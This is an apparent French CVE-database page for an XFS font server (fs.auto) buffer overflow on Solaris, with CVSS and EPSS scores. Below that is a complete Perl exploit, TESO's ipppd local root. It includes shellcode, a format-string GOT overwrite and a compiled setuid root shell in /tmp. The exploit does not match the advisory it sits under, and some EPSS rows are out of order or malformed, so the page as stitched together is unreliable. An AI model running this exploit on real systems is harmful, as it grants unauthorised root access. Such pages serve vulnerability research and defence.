CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Buffer overflow in Dispatch() routine for XFS font server (fs.auto) on Solaris 2.5.1 through 9 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a certain XFS query.
Informations du CVE
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
40.51%
–
–
2022-04-03
–
–
40.51%
–
–
2023-03-12
–
–
–
12.34%
–
2023-04-09
–
–
–
12.34%
–
2023-08-13
–
–
–
13.4%
–
2024-03-10
–
–
–
13.89%
–
2024-03-24
–
–
–
13.89%
–
2024-06-02
–
–
–
13.89%
–
2024-09-22
–
–
–
15.73%
–
2024-12-22
–
–
–
73.1%
–
2025-02-16
–
–
–
76.03%
–
2025-01-19
–
–
–
73.1%
–
2025-02-16
–
–
–
76.03%
–
2025-03-18
–
–
–
–
26.4%
2025-03-30
–
–
–
–
32.17%
2025-04-15
–
–
–
–
32.17%
2025-04-15
–
–
–
–
32.17,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2002-11-24 23h00 +00:00 Auteur : TESO Security EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/6241/info
A remotely exploitable buffer overrun condition has been reported in the XFS font server, fs.auto used by multiple vendors. This vulnerability may be exploited by remote attackers to execute commands on the target host with privileges of user nobody.
This vulnerability has been reported fixed in XFree86 3.3.6 and later.
#!/usr/bin/perl
# 7350pippi - x86/Linux ipppd local root
#
# (C) COPYRIGHT TESO Security, 2002
# All Rights Reserved
#
# May be used under the terms of the GPL.
# ipppd local root exploit:
# ...
# /*
# * Check if there is a device by this name.
# */
# if (stat(cp, &statbuf) < 0) {
# if (errno == ENOENT)
# return 0;
# syslog(LOG_ERR, cp);
# return -1;
# }
# ...
#
# This exploit changes the address of syslog in ipppd's
# GOT. Since it returns -1 as seen above, ipppd will invoke
# syslog() a second time soon this time using the address
# given by us. We redirect the GOT entry to a stacklocation
# where the filename of the executed program is normally
# located. Since we symlink() the shellcode to /usr/sbin/ipppd
# the shellcode goes on the stack AT A FIXED ADDRESS! Thus
# we avoid ugly offsets and guessing/bruteforce.
# If porting this exploits to other systems, you
# need to find syslogs() GOT entry yourself.
#
use Fcntl;
# chown()+chmod() /tmp/boomsh
$shellcode = "\x90"x100 .
"\x31\xc0\xb0\x46\xbb\xff\xff\xff\xff\x31\xc9\xcd\x80\xeb".
"\x2a\x90\x90\x90\x90\x5e\x89\xf3\xff\x03\xff\x43\x04\x31".
"\xc0\x88\x43\x0b\x31\xc0\xb0\xb6\x31\xc9\x31\xd2\xcd\x80".
"\x31\xc0\xb0\x0f\x66\xb9\xed\x0d\xcd\x80\x31\xc0\x40\xcd".
"\x80\xe8\xd5\xff\xff\xff\x2e\x74\x6d\x70\x2e\x62\x6f\x6f".
"\x6d\x73\x68\x2e";
unlink("/tmp/$shellcode");
symlink("/usr/sbin/ipppd", "/tmp/$shellcode") or die "$!";
# my syslog GOT entry @ 0x806c90c
sysopen(O, "/tmp/boomsh.c", O_RDWR|O_CREAT, 0600) or die "$!";
print O<<_EOF_;
#include <stdio.h>
int main()
{
char *a[] = {"/bin/bash", "--norc", "--noprofile", NULL};
setuid(0);
execve(*a, a, NULL);
return -1;
}
_EOF_
close O;
print "Compiling boomshell ...\n";
system("cc /tmp/boomsh.c -o /tmp/boomsh");
$dir = "/tmp/L";
mkdir($dir);
$ret = 0xbffffffb - length($shellcode)+20;
printf("Filename is located @ %x\n", $ret);
# maybe need to change to your GOT entry
# of syslog(); see above
$file = "XX" . pack(c4, 0x0c, 0xc9, 0x06, 0x08) . "1234" . # GOT
pack(c4, 0x0d, 0xc9, 0x06, 0x08) . "1234" . # GOT+1
pack(c4, 0x0e, 0xc9, 0x06, 0x08) . "1234" . # GOT+2
pack(c4, 0x0f, 0xc9, 0x06, 0x08); # GOT+3
$stackpop = "%p"x11;
$file .= $stackpop;
#$file .= "%14d%n%69d%n%40d%n%192d%n";
# Should be fixed. If not, find the 4 values for
# %d yourself using gdb. This worked for me.
$file .= "%221d%n%158d%n%256d%n%192d%n";
open(O, ">$dir/$file") or die "$!";
close O;
system("/tmp/$shellcode", "..$dir/$file/");
exec("/tmp/boomsh");